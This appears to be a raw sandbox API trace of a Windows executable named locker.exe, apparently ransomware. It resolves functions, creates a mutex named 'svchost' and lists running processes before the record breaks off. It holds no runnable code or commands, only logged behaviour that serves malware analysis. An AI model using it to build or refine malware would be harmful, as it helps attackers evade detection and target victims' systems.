0x779d52f0 [0078.560] GetProcAddress (hModule=0x772d0000, lpProcName="CreateSymbolicLinkW") returned 0x772e4510 [0078.560] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentPackageId") returned 0x74cbe260 [0078.560] GetProcAddress (hModule=0x772d0000, lpProcName="GetTickCount64") returned 0x772e0db0 [0078.561] GetProcAddress (hModule=0x772d0000, lpProcName="GetFileInformationByHandleEx") returned 0x772e43d0 [0078.561] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileInformationByHandle") returned 0x7733f110 [0078.561] GetProcAddress (hModule=0x772d0000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x7733f1e0 [0078.561] GetProcAddress (hModule=0x772d0000, lpProcName="InitializeConditionVariable") returned 0x779d3a00 [0078.561] GetProcAddress (hModule=0x772d0000, lpProcName="WakeConditionVariable") returned 0x77a48c50 [0078.561] GetProcAddress (hModule=0x772d0000, lpProcName="WakeAllConditionVariable") returned 0x779d8a90 [0078.561] GetProcAddress (hModule=0x772d0000, lpProcName="SleepConditionVariableCS") returned 0x74d2fca0 [0078.561] GetProcAddress (hModule=0x772d0000, lpProcName="InitializeSRWLock") returned 0x779d3a00 [0078.562] GetProcAddress (hModule=0x772d0000, lpProcName="AcquireSRWLockExclusive") returned 0x779b58e0 [0078.562] GetProcAddress (hModule=0x772d0000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77a32ce0 [0078.562] GetProcAddress (hModule=0x772d0000, lpProcName="ReleaseSRWLockExclusive") returned 0x779b83a0 [0078.562] GetProcAddress (hModule=0x772d0000, lpProcName="SleepConditionVariableSRW") returned 0x74d2fcf0 [0078.562] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThreadpoolWork") returned 0x772e6db0 [0078.562] GetProcAddress (hModule=0x772d0000, lpProcName="SubmitThreadpoolWork") returned 0x779beb00 [0078.562] GetProcAddress (hModule=0x772d0000, lpProcName="CloseThreadpoolWork") returned 0x779bed50 [0078.562] GetProcAddress (hModule=0x772d0000, lpProcName="CompareStringEx") returned 0x772e7050 [0078.563] GetProcAddress (hModule=0x772d0000, lpProcName="GetLocaleInfoEx") returned 0x772e7190 [0078.563] GetProcAddress (hModule=0x772d0000, lpProcName="LCMapStringEx") returned 0x772e7480 [0078.563] GetModuleHandleW (lpModuleName="api-ms-win-core-synch-l1-2-0.dll") returned 0x74bc0000 [0078.564] GetProcAddress (hModule=0x74bc0000, lpProcName="InitializeConditionVariable") returned 0x779d3a00 [0078.564] GetProcAddress (hModule=0x74bc0000, lpProcName="SleepConditionVariableCS") returned 0x74d2fca0 [0078.564] GetProcAddress (hModule=0x74bc0000, lpProcName="WakeAllConditionVariable") returned 0x779d8a90 [0078.564] RtlInitializeConditionVariable (in: ConditionVariable=0x38cea4 | out: ConditionVariable=0x38cea4) [0078.564] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x800) returned 0x3e4fa8 [0078.564] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0078.564] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x339518) returned 0x0 [0078.565] GetCurrentThread () returned 0xfffffffe [0078.565] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0xdcfe7c, lpExitTime=0xdcfe84, lpKernelTime=0xdcfe84, lpUserTime=0xdcfe84 | out: lpCreationTime=0xdcfe7c, lpExitTime=0xdcfe84, lpKernelTime=0xdcfe84, lpUserTime=0xdcfe84) returned 1 [0078.565] RtlInitializeSListHead (in: ListHead=0x38d280 | out: ListHead=0x38d280) [0078.565] GetVersion () returned 0x23f00206 [0078.565] GetVersion () returned 0x23f00206 [0078.566] GetVersion () returned 0x23f00206 [0078.566] GetVersion () returned 0x23f00206 [0078.566] GetVersion () returned 0x23f00206 [0078.566] GetVersion () returned 0x23f00206 [0078.566] GetVersion () returned 0x23f00206 [0078.566] GetVersion () returned 0x23f00206 [0078.566] GetVersion () returned 0x23f00206 [0078.566] GetStartupInfoW (in: lpStartupInfo=0xdcfe70 | out: lpStartupInfo=0xdcfe70*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\locker.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0078.566] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x32cf39) returned 0x339518 [0078.566] SetErrorMode (uMode=0x1) returned 0x0 [0078.566] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="svchost") returned 0x234 [0078.566] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x0 [0078.567] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xdcfb20, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0078.567] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x3d2978 [0078.567] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x238 [0078.587] Process32First (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0078.588] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0078.589] GetCurrentProcessId () returned 0x1170 [0078.589] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0078.589] GetCurrentProcessId () returned 0x1170 [0078.589] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0078.590] GetCurrentProcessId () returned 0x1170 [0078.590] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0078.591] GetCurrentProcessId () returned 0x1170 [0078.591] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0078.591] GetCurrentProcessId () returned 0x1170 [0078.591] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0078.592] GetCurrentProcessId () returned 0x1170 [0078.592] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0078.593] GetCurrentProcessId () returned 0x1170 [0078.593] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0078.593] GetCurrentProcessId () returned 0x1170 [0078.593] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0078.594] GetCurrentProcessId () returned 0x1170 [0078.594] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0078.595] GetCurrentProcessId () returned 0x1170 [0078.595] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0078.595] GetCurrentProcessId () returned 0x1170 [0078.595] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0078.596] GetCurrentProcessId () returned 0x1170 [0078.596] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0078.597] GetCurrentProcessId () returned 0x1170 [0078.597] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0078.597] GetCurrentProcessId () returned 0x1170 [0078.597] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0078.598] GetCurrentProcessId () returned 0x1170 [0078.598] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0078.599] GetCurrentProcessId () returned 0x1170 [0078.599] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0078.600] GetCurrentProcessId () returned 0x1170 [0078.600] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0078.602] GetCurrentProcessId () returned 0x1170 [0078.602] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0078.602] GetCurrentProcessId () returned 0x1170 [0078.602] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0078.603] GetCurrentProcessId () returned 0x1170 [0078.603] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0078.604] GetCurrentProcessId () returned 0x1170 [0078.604] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0078.604] GetCurrentProcessId () returned 0x1170 [0078.604] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0078.605] GetCurrentProcessId () returned 0x1170 [0078.605] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0078.606] GetCurrentProcessId () returned 0x1170 [0078.606] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0078.606] GetCurrentProcessId () returned 0x1170 [0078.606] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0078.607] GetCurrentProcessId () returned 0x1170 [0078.607] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0078.607] GetCurrentProcessId () returned 0x1170 [0078.607] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0078.608] GetCurrentProcessId () returned 0x1170 [0078.608] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0078.609] GetCurrentProcessId () returned 0x1170 [0078.609] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3a, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0078.610] GetCurrentProcessId () returned 0x1170 [0078.610] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0078.611] GetCurrentProcessId () returned 0x1170 [0078.611] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0078.612] GetCurrentProcessId () returned 0x1170 [0078.612] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0078.612] GetCurrentProcessId () returned 0x1170 [0078.612] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0078.613] GetCurrentProcessId () returned 0x1170 [0078.613] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0078.614] GetCurrentProcessId () returned 0x1170 [0078.614] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0078.614] GetCurrentProcessId () returned 0x1170 [0078.614] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0078.615] GetCurrentProcessId () returned 0x1170 [0078.615] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending windsor.exe")) returned 1 [0078.616] GetCurrentProcessId () returned 0x1170 [0078.616] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="organisations appointment impressed.exe")) returned 1 [0078.617] GetCurrentProcessId () returned 0x1170 [0078.617] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="housing.exe")) returned 1 [0078.617] GetCurrentProcessId () returned 0x1170 [0078.617] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x764, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0078.618] GetCurrentProcessId () returned 0x1170 [0078.618] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="excitement.exe")) returned 1 [0078.619] GetCurrentProcessId () returned 0x1170 [0078.619] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="holdervg.exe")) returned 1 [0078.619] GetCurrentProcessId () returned 0x1170 [0078.619] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="passenger smoke.exe")) returned 1 [0078.620] GetCurrentProcessId () returned 0x1170 [0078.620] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixing.exe")) returned 1 [0078.620] GetCurrentProcessId () returned 0x1170 [0078.620] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="negotiations-g-mountains.exe")) returned 1 [0078.621] GetCurrentProcessId () returned 0x1170 [0078.621] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="specdecemberstarter.exe")) returned 1 [0078.622] GetCurrentProcessId () returned 0x1170 [0078.622] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flight-msg.exe")) returned 1 [0078.623] GetCurrentProcessId () returned 0x1170 [0078.623] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gradually sealed rolls.exe")) returned 1 [0078.623] GetCurrentProcessId () returned 0x1170 [0078.623] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xab4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="amendmenttender.exe")) returned 1 [0078.624] GetCurrentProcessId () returned 0x1170 [0078.624] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="persistent.exe")) returned 1 [0078.625] GetCurrentProcessId () returned 0x1170 [0078.625] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="built.exe")) returned 1 [0078.625] GetCurrentProcessId () returned 0x1170 [0078.625] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="recommend.exe")) returned 1 [0078.626] GetCurrentProcessId () returned 0x1170 [0078.626] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="muchtamil.exe")) returned 1 [0078.627] GetCurrentProcessId () returned 0x1170 [0078.627] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saving-programmes-officially.exe")) returned 1 [0078.628] GetCurrentProcessId () returned 0x1170 [0078.628] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="charleston_value_flag.exe")) returned 1 [0078.628] GetCurrentProcessId () returned 0x1170 [0078.628] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mom-george-depending.exe")) returned 1 [0078.629] GetCurrentProcessId () returned 0x1170 [0078.629] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="dumb.exe")) returned 1 [0078.631] GetCurrentProcessId () returned 0x1170 [0078.631] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0078.632] GetCurrentProcessId () returned 0x1170 [0078.632] Process32Next (in: hSnapshot=0x238, lppe=0xdcfb08 | out: lppe=0xdcfb08*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, 